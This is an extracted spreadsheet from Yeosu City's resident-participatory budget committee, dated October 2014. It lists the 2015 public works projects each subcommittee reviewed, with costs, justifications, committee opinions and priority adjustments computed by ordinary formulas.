Workbook

Sheet 겉표지
H2: 2014. 10.
A7: 2015년도 예산편성을 위한
A8: 주민참여예산위원회 우선순위 결정 대상사업
A25: 여수시 주민참여예산위원회

Sheet 속표지
A1: 주민참여예산제 분과위원회 개최 결과
B3: □ | C3: 개최기간 | D3: : | E3: 2014. 10. 1 ∼ 10. 10
B4: □ | C4: 개최분과 | D4: : | E4: 6개 분과
B5: □ | C5: 대 상 | D5: : | E5: 2015년도 예산편성 자체사업(3,000만원 이상)
B6: □ | C6: 개최결과 | D6: : | E6: 609건 우선순위 조정
B8: 분과명 | E8: 자체사업 | G8: 조정건수 | H8: 비고
E9: 건수 | F9: 금액(백만원)
B10: 계 | E10: =SUM(E11:E16) -> 609 | F10: =SUM(F11:F16) -> 132899.9 | G10: =SUM(G11:G16) -> 37
B11: 행정지원분과 | E11: =행정지원분과표지!F7 -> 50 | F11: =행정지원분과표지!I7 -> 11210 | G11: 37
B12: 복지·환경분과 | E12: =복지환경분과표지!F7 -> 58 | F12: =복지환경분과표지!I7 -> 4082.1 | G12: 0
B13: 관광·문화분과 | E13: =관광문화분과표지!F7 -> 61 | F13: =관광문화분과표지!I7 -> 6539 | G13: 0
B14: 보건·위생분과 | E14: =보건위생분과표지!F7 -> 13 | F14: =보건위생분과표지!I7 -> 1431 | G14: 0
B15: 농업분과 | E15: =농업분과표지!F7 -> 55 | F15: =농업분과표지!I7 -> 5795 | G15: 0
B16: 도시·건설분과 | E16: =도시건설분과표지!F7 -> 372 | F16: =도시건설분과표지!I7 -> 103842.8 | G16: 0

Sheet 행정지원분과표지
A3: 행정지원분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F15) -> 50 | G7: 건, | I7: =SUM(I9:I15) -> 11210
C9: ㅇ | D9: 회계과 | E9: : | F9: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D9) -> 20 | G9: 건, | I9: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D9,행정지원분과!$D$5:$D$10000) -> 6627
C10: ㅇ | D10: 체육지원과 | E10: : | F10: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D10) -> 20 | G10: 건, | I10: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D10,행정지원분과!$D$5:$D$10000) -> 1720
C11: ㅇ | D11: 민원지적과 | E11: : | F11: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D11) -> 1 | G11: 건, | I11: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D11,행정지원분과!$D$5:$D$10000) -> 460
C12: ㅇ | D12: 정보통신과 | E12: : | F12: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D12) -> 6 | G12: 건, | I12: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D12,행정지원분과!$D$5:$D$10000) -> 2213
C13: ㅇ | D13: 박람회활용과 | E13: : | F13: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D13) -> 1 | G13: 건, | I13: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D13,행정지원분과!$D$5:$D$10000) -> 50
C14: ㅇ | D14: 지역경제과 | E14: : | F14: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D14) -> 1 | G14: 건, | I14: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D14,행정지원분과!$D$5:$D$10000) -> 100
C15: ㅇ | D15: 의회사무국 | E15: : | F15: =COUNTIF(행정지원분과!$B$5:$B$54,행정지원분과표지!D15) -> 1 | G15: 건, | I15: =SUMIF(행정지원분과!$B$5:$B$10000,행정지원분과표지!D15,행정지원분과!$D$5:$D$10000) -> 40

Sheet 우선순위행정지원
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B11) -> 50 | C4: =SUM(C5:C11) -> 37
A5: 회계과 | B5: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A5) -> 20 | C5: =COUNTIFS(행정지원분과!$B$5:$B$10000,A5,행정지원분과!$K$5:$K$10000,"틀림") -> 18 | D5: ㅇ 여서, 돌산청사 휴게실 및 샤워실 공사 등
A6: 체육지원과 | B6: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A6) -> 20 | C6: =COUNTIFS(행정지원분과!$B$5:$B$10000,A6,행정지원분과!$K$5:$K$10000,"틀림") -> 17 | D6: ㅇ 망마국민체육센터 도색 및 방수공사 등
A7: 민원지적과 | B7: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A7) -> 1 | C7: =COUNTIFS(행정지원분과!$B$5:$B$10000,A7,행정지원분과!$K$5:$K$10000,"틀림") -> 0 | D7: ㅇ 원안대로 가결
A8: 정보통신과 | B8: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A8) -> 6 | C8: =COUNTIFS(행정지원분과!$B$5:$B$10000,A8,행정지원분과!$K$5:$K$10000,"틀림") -> 2 | D8: ㅇ 상ㆍ하수도 GIS DB 갱신 용역 등
A9: 박람회활용과 | B9: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A9) -> 1 | C9: =COUNTIFS(행정지원분과!$B$5:$B$10000,A9,행정지원분과!$K$5:$K$10000,"틀림") -> 0 | D9: ㅇ 원안대로 가결
A10: 지역경제과 | B10: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A10) -> 1 | C10: =COUNTIFS(행정지원분과!$B$5:$B$10000,A10,행정지원분과!$K$5:$K$10000,"틀림") -> 0 | D10: ㅇ 원안대로 가결
A11: 의회사무국 | B11: =COUNTIF(행정지원분과!$B$5:$B$10000,우선순위행정지원!A11) -> 1 | C11: =COUNTIFS(행정지원분과!$B$5:$B$10000,A11,행정지원분과!$K$5:$K$10000,"틀림") -> 0 | D11: ㅇ 원안대로 가결

Sheet 행정지원분과
A1: 주민참여 예산제 행정지원 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 계 | C4: =COUNTA(C5:C54) -> 50 | D4: =SUM(D5:D55) -> 11210
A5: 1 | B5: 회계과 | C5: 여서동 주민(자치)센터 신축 건립 | D5: 3007 | E5: 여서동 386번지 | F5: 연면적1,400㎡ (지하1~ 지상4층) 1동 | G5: 26년 경과된 노후 건축물로써 주민자치 공간 기능저하로 주민 이용에 불편을 초래하고 있어, 주민센터를 신축하여 지역주민에게 보다 편리한 행정서비스 제공과 사회복지, 문화시설, 여가기능 등을 통한 주민들의 삶의 질 향상 및 지역공동체 형성의 구심체 역할 담당에 기여 | H5: 주민행정 서비스 수요 필요 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 회계과 | C6: 소라면사무소 신축공사 | D6: 2300 | E6: 소라면사무소 소라면 덕양로 389 | F6: 3층 신축 (1,350㎡) | G6: 기존 창고가 면사무소와 거리가 떨어져 있고 차량진입이 어려워 기자재 및 집기 등 보관이 어려움 | H6: 주민행정 서비스 수요 필요 | I6: 2 | J6: 2 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 회계과 | C7: 여서, 돌산청사 휴게실 및 샤워실 공사 | D7: 40 | E7: 여서청사 돌산청사 | F7: 휴게실2, 샤워실 2 | G7: 직원 및 시민들을 위한 휴게실을 설치하고 현장근무자들을 위한 샤워실설치 | H7: 돌산청사에 시민을 위한 휴게실은 필요치 않으므로 순위 조정 | I7: 3 | J7: 7 | K7: =IF(I7=J7,"맞음","틀림") -> 틀림
A8: 4 | B8: 회계과 | C8: 본청사 비상발전기 추가 설치공사 | D8: 100 | E8: 본청사 | F8: 발전용량 300KW 1식 | G8: 현재 본청사 전기설비 정전시 비상 발전 전원(380v) 투입 불가로 전산실,통신실 등 일부 기계 설비(항온항습기, 냉방기 등) 사용불가한 바 원활한 전력공급을 위해 비상발전기(380v) 추가설치 | H8: 비상대비 추가설치 필요 | I8: 4 | J8: 3 | K8: =IF(I8=J8,"맞음","틀림") -> 틀림
A9: 5 | B9: 회계과 | C9: 여서청사 엘리베이터 설치공사 | D9: 200 | E9: 여서청사 | F9: 엘리베이터1대 (15인용) | G9: 노약자 및 장애인을 위한 엘리베이터 설치로 대민서비스 향상 | H9: 장애인을 위한 교육장은 별도 시설되어 있으며, 교육장에 참여한 노약자는 3층 거동이 가능 할 것으로 판단되어 순위 조정 함 | I9: 5 | J9: 20 | K9: =IF(I9=J9,"맞음","틀림") -> 틀림
A10: 6 | B10: 회계과 | C10: 여서청사 집행부대기실 내부 수선공사 | D10: 40 | E10: 여서청사 | F10: 집행부대기실 내부 인테리어공사 (191㎡) | G10: 집행부 대기실의 쾌적한 근무 환경 조성 | H10: 쾌적한 근무환경 조성 필요 | I10: 6 | J10: 8 | K10: =IF(I10=J10,"맞음","틀림") -> 틀림
A11: 7 | B11: 회계과 | C11: 본청사 LED조명 교체 공사 | D11: 100 | E11: 본청사 및 구보건소 | F11: LED조명 400등 | G11: 청사내 LED조명을 교체하여 에너지절약 및 녹색청사 관리 만전 | H11: 에너지 절약 사업 추진 | I11: 7 | J11: 4 | K11: =IF(I11=J11,"맞음","틀림") -> 틀림
A12: 8 | B12: 회계과 | C12: 구)보건소 외부 바닥 정비공사 | D12: 90 | E12: 학동 구 보건소 | F12: 외부 바닥 포장(920㎡) | G12: 외부 바닥 노후로 블록이 들뜨고 우천 시 물이 고여 청사 이용에 불편 초래 | H12: 좌동 | I12: 8 | J12: 9 | K12: =IF(I12=J12,"맞음","틀림") -> 틀림
A13: 9 | B13: 회계과 | C13: 여서청사 위원회회의실 내부공사 | D13: 40 | E13: 여서청사 | F13: 위원회 사무실 2개소내부 인테이어 197㎡ | G13: 인테리어 공사 실시로 쾌적한 근무 환경 개선, 미관향성, 대민홍보에 기여 | H13: 좌동 | I13: 9 | J13: 10 | K13: =IF(I13=J13,"맞음","틀림") -> 틀림
A14: 10 | B14: 회계과 | C14: 돌산청사 LED램프 교체공사 | D14: 140 | E14: 돌산청사 | F14: LED램프 560등 | G14: 노후 전등 교체로 근무환경개선 및 청사 에너지 절약 | H14: 에너지 절약 차원에서 순위 조정 | I14: 10 | J14: 5 | K14: =IF(I14=J14,"맞음","틀림") -> 틀림
A15: 11 | B15: 회계과 | C15: 여서청사 LED램프 교체공사 | D15: 60 | E15: 여서청사 | F15: LED램프 240등 | G15: 노후 전등 교체로 근무환경개선 및 청사 에너지 절약 | H15: 에너지 절약 차원에서 순위 조정 | I15: 11 | J15: 6 | K15: =IF(I15=J15,"맞음","틀림") -> 틀림
A16: 12 | B16: 회계과 | C16: 돌산청사 보도블럭 보수공사 | D16: 100 | E16: 돌산청사 | F16: 청사내 보도블록, 배수로 블록, 경개석 교체 | G16: 보도블럭 깨짐 및 침하등으로 안전사고 위험이 높아 교체공사를 통한 안전사고 예방 및 청사관리 철저 | H16: 좌동 | I16: 12 | J16: 11 | K16: =IF(I16=J16,"맞음","틀림") -> 틀림
... A54: 50 | B54: 의회사무국 | C54: 본회의장 바닥 및 벽면 정비공사 | D54: 40 | E54: 여수시의회 본회의장 | F54: 카펫트 및 벽지교체 1식, 바닥보수1식 | G54: 본회의장 카펫트 및 벽지 교체, 집행부석 마루 부분 보수 등 | H54: 좌 동 | I54: 1 | J54: 1 | K54: =IF(I54=J54,"맞음","틀림") -> 맞음

Sheet 복지환경분과표지
A3: 복지·환경분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F14) -> 58 | G7: 건, | I7: =SUM(I9:I14) -> 4082.1
C9: ㅇ | D9: 노인장애인과 | E9: : | F9: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D9) -> 33 | G9: 건, | I9: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D9)*(복지환경분과!$D$5:$D$10006)) -> 1797
C10: ㅇ | D10: 여성가족과 | E10: : | F10: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D10) -> 1 | G10: 건, | I10: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D10)*(복지환경분과!$D$5:$D$10006)) -> 30
C11: ㅇ | D11: 도시미화과 | E11: : | F11: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D11) -> 4 | G11: 건, | I11: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D11)*(복지환경분과!$D$5:$D$10006)) -> 617.6
C12: ㅇ | D12: 생활자원과 | E12: : | F12: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D12) -> 8 | G12: 건, | I12: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D12)*(복지환경분과!$D$5:$D$10006)) -> 760
C13: ㅇ | D13: 문화예술과 | E13: : | F13: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D13) -> 7 | G13: 건, | I13: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D13)*(복지환경분과!$D$5:$D$10006)) -> 526.5
C14: ㅇ | D14: 시립도서관 | E14: : | F14: =COUNTIF(복지환경분과!$B$5:$B$1006,복지환경분과표지!D14) -> 5 | G14: 건, | I14: =SUMPRODUCT((복지환경분과!$B$5:$B$10006=복지환경분과표지!D14)*(복지환경분과!$D$5:$D$10006)) -> 351

Sheet 우선순위복지환경
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B10) -> 58 | C4: =SUM(C5:C10) -> 0
A5: 노인장애인과 | B5: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A5) -> 33 | C5: =COUNTIFS(복지환경분과!$B$5:$B$10006,A5,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D5: ㅇ 원안대로 가결
A6: 여성가족과 | B6: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A6) -> 1 | C6: =COUNTIFS(복지환경분과!$B$5:$B$10006,A6,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D6: ㅇ 원안대로 가결
A7: 도시미화과 | B7: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A7) -> 4 | C7: =COUNTIFS(복지환경분과!$B$5:$B$10006,A7,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D7: ㅇ 원안대로 가결
A8: 생활자원과 | B8: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A8) -> 8 | C8: =COUNTIFS(복지환경분과!$B$5:$B$10006,A8,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D8: ㅇ 원안대로 가결
A9: 문화예술과 | B9: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A9) -> 7 | C9: =COUNTIFS(복지환경분과!$B$5:$B$10006,A9,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D9: ㅇ 원안대로 가결
A10: 시립도서관 | B10: =COUNTIF(복지환경분과!$B$5:$B$10006,우선순위복지환경!A10) -> 5 | C10: =COUNTIFS(복지환경분과!$B$5:$B$10006,A10,복지환경분과!$K$5:$K$10006,"틀림") -> 0 | D10: ㅇ 원안대로 가결

Sheet 복지환경분과
A1: 주민참여 예산제 복지환경 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 총계 | C4: =COUNTA(C5:C70) -> 58 | D4: =SUM(D5:D71) -> 4082.1
A5: 1 | B5: 노인장애인과 | C5: 경로당 소규모 긴급 기능보강사업 | D5: 80 | E5: 관내 등록경로당 | F5: 40개소 | G5: 태풍 등 긴급 보수공사시 | H5: 원안가결 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 노인장애인과 | C6: 계동경로당 개축공사 | D6: 130 | E6: 돌산읍 계동안길 25 | F6: 개축1식 | G6: 1978년 건축된 건물로 노후되어 개축 필요 | H6: 원안가결 | I6: 28 | J6: 28 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 노인장애인과 | C7: 백포경로당 개축공사 | D7: 130 | E7: 돌산읍 백포길 18 | F7: 개축1식 | G7: 1993년 건축된 건물로 노후되어 개축 필요 | H7: 원안가결 | I7: 31 | J7: 31 | K7: =IF(I7=J7,"맞음","틀림") -> 맞음
A8: 4 | B8: 노인장애인과 | C8: 덕양2구 경로당 보수공사 | D8: 20 | E8: 소라면 덕양리 1433 | F8: 보수1식 | G8: 내부에 화장실이 없어 거동 불편 어르신들 이용이 불편 | H8: 원안가결 | I8: 18 | J8: 18 | K8: =IF(I8=J8,"맞음","틀림") -> 맞음
A9: 5 | B9: 노인장애인과 | C9: 대포4구 마전경로당 보수공사 | D9: 20 | E9: 소라면 마전길 35 | F9: 보수1식 | G9: 건물 노후로 인한 누수로 방수공사 쾌적한 환경제공코자 보수공사 필요 | H9: 원안가결 | I9: 25 | J9: 25 | K9: =IF(I9=J9,"맞음","틀림") -> 맞음
A10: 6 | B10: 노인장애인과 | C10: 복산1구경로당 보수공사 | D10: 20 | E10: 소라면 조산로 124-1 | F10: 보수1식 | G10: 건물 노후로 인한 누수로 방수공사 쾌적한 환경제공코자 보수공사 필요 | H10: 원안가결 | I10: 17 | J10: 17 | K10: =IF(I10=J10,"맞음","틀림") -> 맞음
A11: 7 | B11: 노인장애인과 | C11: 복산6구 경로당 보수공사 | D11: 20 | E11: 소라면 풍류길 18 | F11: 보수1식 | G11: 건물 노후로 인한 누수로 방수공사 쾌적한 환경제공코자 보수공사 필요 | H11: 원안가결 | I11: 27 | J11: 27 | K11: =IF(I11=J11,"맞음","틀림") -> 맞음
A12: 8 | B12: 노인장애인과 | C12: 대포4구장전경로당 보수공사 | D12: 20 | E12: 소라면 장전길 62-7 | F12: 보수1식 | G12: 건물 노후로 인한 누수로 방수공사 쾌적한 환경제공코자 보수공사 필요 | H12: 원안가결 | I12: 20 | J12: 20 | K12: =IF(I12=J12,"맞음","틀림") -> 맞음
A13: 9 | B13: 노인장애인과 | C13: 내리경로당 보수공사 | D13: 20 | E13: 율촌면 반월리 635 | F13: 보수1식 | G13: 태풍 나크리시 집중호우로 옹벽 붕괴되어 위험하므로 석축공사 필요 | H13: 원안가결 | I13: 9 | J13: 9 | K13: =IF(I13=J13,"맞음","틀림") -> 맞음
A14: 10 | B14: 노인장애인과 | C14: 신풍삼거리경로당 개축공사 | D14: 100 | E14: 율촌면 여순로 411 | F14: 개축1식 | G14: 1969년 건축된 건물로 노후되어 개축공사 필요 | H14: 원안가결 | I14: 22 | J14: 22 | K14: =IF(I14=J14,"맞음","틀림") -> 맞음
A15: 11 | B15: 노인장애인과 | C15: 상전경로당 증축공사 | D15: 50 | E15: 화양면 상촌길 15 | F15: 증축1식 | G15: 남녀 분리공간이 부족하고 회원수에 비해 공간이 부족하므로 증축 필요 | H15: 원안가결 | I15: 26 | J15: 26 | K15: =IF(I15=J15,"맞음","틀림") -> 맞음
A16: 12 | B16: 노인장애인과 | C16: 봉오경로당보수공사 | D16: 10 | E16: 화양면 봉오동길 34 | F16: 보수1식 | G16: 누수로 경로당에 곰팡이 등 발생하여 보수공사 필요 | H16: 원안가결 | I16: 19 | J16: 19 | K16: =IF(I16=J16,"맞음","틀림") -> 맞음
... A53: 49 | B53: 문화예술과 | C53: 시민회관 리허설 룸 환경정비공사 | D53: 31 | E53: 시민회관 | F53: 시회관 리허설 룸 315㎡ | G53: 시민회관 지하 리허설 룸 썩고 부식된 마루판,마이톤,벽지등 보수정비하여 청결한 리허설 환경 조성 이용자 편의제공 | H53: 원안가결 | I53: 1 | J53: 1 | K53: =IF(I53=J53,"맞음","틀림") -> 맞음
A54: 50 | B54: 문화예술과 | C54: 시민회관 수변전설비 용량 감설공사 | D54: 40 | E54: 시민회관 | F54: 수변설비 1,600kW=> 1,000kW | G54: 시민회관․진남문예회관 수변전설비 용량을 1,600KW에서 1,000KW로 감설 (절전효과 연간 52,560KWH, 5,256천원) | H54: 사업 제외(사업 타당성 재검토) | K54: =IF(I54=J54,"맞음","틀림") -> 맞음
A55: 51 | B55: 문화예술과 | C55: 시민회관음향장비 교체구매설치 | D55: 95 | E55: 시민회관 | F55: 시민회관 음향장비 1식 | G55: 노후화된 음향장비를 신품으로 교체하여 음향장비를 현대화하고 기존 부족한 스피커를 보강하여 공연시 맑고 풍부하며안정적인 음향 서비스제공 | H55: 원안가결 | I55: 2 | J55: 2 | K55: =IF(I55=J55,"맞음","틀림") -> 맞음
A56: 52 | B56: 문화예술과 | C56: 시민,진남문예회관 공연 중계용 카메라 교체 구매설치 | D56: 60.5 | E56: 시민,진남문예회관 | F56: 시민,진남문예회관 카메라 2대 | G56: 화소가 낮아 화질이 떨어지고 노후화된 여수시민․진남문예회관 공연중계 카메라를 화소가 높고 화질이 선명한 카메라로 교체로 선명한 양질의 영상서비스제공 | H56: 원안가결 | I56: 3 | J56: 3 | K56: =IF(I56=J56,"맞음","틀림") -> 맞음
A57: 53 | B57: 문화예술과 | C57: 진남문예회관 무대조명 설비 교체공사 | D57: 150 | E57: 진남문예회관 | F57: 할로겐등기구 166등=>LED 95등 | G57: 노후조명설비(할로겐등 166등)를 LED 무대조명설비(95등)로 교체(71등 감소) (절전효과 연간 52,168KWH, 5,168천원) | H57: 원안가결 | I57: 4 | J57: 4 | K57: =IF(I57=J57,"맞음","틀림") -> 맞음
A58: 54 | B58: 시립도서관 | C58: 쌍봉도서관 임시주차장 조성공사 | D58: 51 | E58: 여수시 학동 65번지내 | F58: 704㎡ | G58: 비포장 임시주차장을 정비하여 주변 (복지관, 청소년수련관) 시설 및 도서관 이용자 편의제공 | H58: 원안가결 | I58: 1 | J58: 1 | K58: =IF(I58=J58,"맞음","틀림") -> 맞음
A59: 55 | B59: 시립도서관 | C59: 쌍봉,현암도서관 흡연실조성 | D59: 40 | E59: 쌍봉도서관, 현암도서관 | F59: 2개소(스모킹 부스) | G59: 일반이용자와 분리된 흡연구역을 조성하여 흡연자 권리 및 비흡연 이용자의 건강보호 | H59: 원안가결 | I59: 3 | J59: 3 | K59: =IF(I59=J59,"맞음","틀림") -> 맞음
A60: 56 | B60: 시립도서관 | C60: 현암도서관 화장실 리모델링 | D60: 120 | E60: 충민사길 43 | F60: 108㎡ | G60: 16년 이상된 화장실, 리모델링을 통한 규정에 적합한 장애인용 화장실 조성 등 | H60: 원안가결 | I60: 5 | J60: 5 | K60: =IF(I60=J60,"맞음","틀림") -> 맞음
A61: 57 | B61: 시립도서관 | C61: 현암도서관 노트북 Zone 조성 | D61: 60 | E61: 충민사길 43 | F61: 54㎡ | G61: 변화하는 이용자 수요 충족, 개인 노트북 사용 공간 확보로 이용자 만족도 제고 | H61: 원안가결 | I61: 4 | J61: 4 | K61: =IF(I61=J61,"맞음","틀림") -> 맞음
A62: 58 | B62: 시립도서관 | C62: 환경도서관 2층 리모델링 | D62: 80 | E62: 문수로 53-32 | F62: 321㎡ | G62: 홍보전시관⇒일반자료실로 확장 리모델링하여 학습실 공간 확보하여 이용자 민원해소 | H62: 원안가결 | I62: 2 | J62: 2 | K62: =IF(I62=J62,"맞음","틀림") -> 맞음
K68: =IF(I68=J68,"맞음","틀림") -> 맞음

Sheet 관광문화분과표지
A3: 관광·문화분과 소관
D7: 총 계 | E7: : | F7: =SUM(F9:F13) -> 61 | G7: 건, | I7: =SUM(I9:I13) -> 6539
C9: ㅇ | D9: 관광과 | E9: : | F9: =COUNTIF(관광문화분과!$B$5:$B$1003,관광문화분과표지!D9) -> 5 | G9: 건, | I9: =SUMPRODUCT((관광문화분과!$B$5:$B$10003=관광문화분과표지!D9)*(관광문화분과!$D$5:$D$10003)) -> 530
C10: ㅇ | D10: 수산경영과 | E10: : | F10: =COUNTIF(관광문화분과!$B$5:$B$1003,관광문화분과표지!D10) -> 2 | G10: 건, | I10: =SUMPRODUCT((관광문화분과!$B$5:$B$10003=관광문화분과표지!D10)*(관광문화분과!$D$5:$D$10003)) -> 420
C11: ㅇ | D11: 어업생산과 | E11: : | F11: =COUNTIF(관광문화분과!$B$5:$B$1003,관광문화분과표지!D11) -> 3 | G11: 건, | I11: =SUMPRODUCT((관광문화분과!$B$5:$B$10003=관광문화분과표지!D11)*(관광문화분과!$D$5:$D$10003)) -> 394
C12: ㅇ | D12: 해양항만레저과 | E12: : | F12: =COUNTIF(관광문화분과!$B$5:$B$1003,관광문화분과표지!D12) -> 2 | G12: 건, | I12: =SUMPRODUCT((관광문화분과!$B$5:$B$10003=관광문화분과표지!D12)*(관광문화분과!$D$5:$D$10003)) -> 230
C13: ㅇ | D13: 섬자원개발과 | E13: : | F13: =COUNTIF(관광문화분과!$B$5:$B$1003,관광문화분과표지!D13) -> 49 | G13: 건, | I13: =SUMPRODUCT((관광문화분과!$B$5:$B$10003=관광문화분과표지!D13)*(관광문화분과!$D$5:$D$10003)) -> 4965

Sheet 우선순위관광문화
A1: □ 분과위원회 개최결과 - 우선순위 조정
A3: 부서명 | B3: 사업 건수 | C3: 조정 건수 | D3: 조정사업 내역 | E3: 비고
A4: 계 | B4: =SUM(B5:B10) -> 61 | C4: =SUM(C5:C10) -> 0
A5: 관광과 | B5: =COUNTIF(관광문화분과!$B$5:$B$10003,우선순위관광문화!A5) -> 5 | C5: =COUNTIFS(관광문화분과!$B$5:$B$10003,A5,관광문화분과!$K$5:$K$10003,"틀림") -> 0 | D5: ㅇ 원안대로 가결
A6: 수산경영과 | B6: =COUNTIF(관광문화분과!$B$5:$B$10003,우선순위관광문화!A6) -> 2 | C6: =COUNTIFS(관광문화분과!$B$5:$B$10003,A6,관광문화분과!$K$5:$K$10003,"틀림") -> 0 | D6: ㅇ 원안대로 가결
A7: 어업생산과 | B7: =COUNTIF(관광문화분과!$B$5:$B$10003,우선순위관광문화!A7) -> 3 | C7: =COUNTIFS(관광문화분과!$B$5:$B$10003,A7,관광문화분과!$K$5:$K$10003,"틀림") -> 0 | D7: ㅇ 원안대로 가결
A8: 해양항만레저과 | B8: =COUNTIF(관광문화분과!$B$5:$B$10003,우선순위관광문화!A8) -> 2 | C8: =COUNTIFS(관광문화분과!$B$5:$B$10003,A8,관광문화분과!$K$5:$K$10003,"틀림") -> 0 | D8: ㅇ 원안대로 가결
A9: 섬자원개발과 | B9: =COUNTIF(관광문화분과!$B$5:$B$10003,우선순위관광문화!A9) -> 49 | C9: =COUNTIFS(관광문화분과!$B$5:$B$10003,A9,관광문화분과!$K$5:$K$10003,"틀림") -> 0 | D9: ㅇ 원안대로 가결

Sheet 관광문화분과
A1: 주민참여 예산제 관광·문화 분과위원회 자체사업 검토결과서
H2: (단위 : 백만원)
A3: 연번 | B3: 소관부서 | C3: 사업명 | D3: 사업비 | E3: 위치 | F3: 사업내용 | G3: 필요성 | H3: 분과위원회 검토의견 | I3: 주관부서 우선순위 | J3: 분과위 우선순위
A4: 계 | C4: =COUNTA(C5:C68) -> 61 | D4: =SUM(D5:D68) -> 6539
A5: 1 | B5: 관광과 | C5: 평화 테마촌정비사업 | D5: 50 | E5: 돌산읍 율림리 | F5: 보도,담장정비 | G5: 평화 테마촌 방문객에 대한 부족한 편의시설 조성 및 전시물 유지 관리 | H5: 원안대로 가결 | I5: 1 | J5: 1 | K5: =IF(I5=J5,"맞음","틀림") -> 맞음
A6: 2 | B6: 관광과 | C6: 여수거북선호 보존 및 시설물 정비 | D6: 250 | E6: 여수거북선호 | F6: 기관선체수리공사 시설물 유지관리 | G6: o 여수거북선호 정기검사에 따른 기관,선체 수리공사 시행 o 여수거북선호 시설물 유지관리를 위한 선체 도장, 비상계단 등 정비 | H6: 원안대로 가결 | I6: 2 | J6: 2 | K6: =IF(I6=J6,"맞음","틀림") -> 맞음
A7: 3 | B7: 관광과 | C7: 관광지 편의시설물 유지 관리 | D7: 160 | E7: 여수시 일원 | F7: 관광지 편의시설물 유지 관리 1식 (사업요인 발생시 수시 시행) | G7: 관광시설물(화장실 등) 정비 및 주요관광지 편의시설물 유지 관리를 통해 깨끗하고 쾌적한 명품 관광 여수 이미지 제고 | H7: 원안대로 가결 | I7: 3 | J7: 3 | K7: =IF(I7=J7,"맞음","틀림") -> 맞음
A8: 4 | B8: 관광과 | C8: 사도 관광지 가로등 관로 보수공사 | D8: 30 | E8: 화정면 사도리 일원 | F8: 전기관로 교체 L=400m | G8: 전기관로가 노후되어 누전이 일어나는등 관광객 불편 초래 | H8: 원안대로 가결 | I8: 4 | J8: 4 | K8: =IF(I8=J8,"맞음","틀림") -> 맞음
A9: 5 | B9: 관광과 | C9: 굴전 여가캠프장 정비공사 | D9: 40 | E9: 돌산읍 굴전리 일원 | F9: 포장 A=500㎡ 배수로L=50m 샤워장 환풍기 1식 | G9: 우천시 정화조로 우수가 유입되어 악취가 발생되는 등 이용객 불편 초래 | H9: 원안대로 가결 | I9: 5 | J9: 5 | K9: =IF(I9=J9,"맞음","틀림") -> 맞음
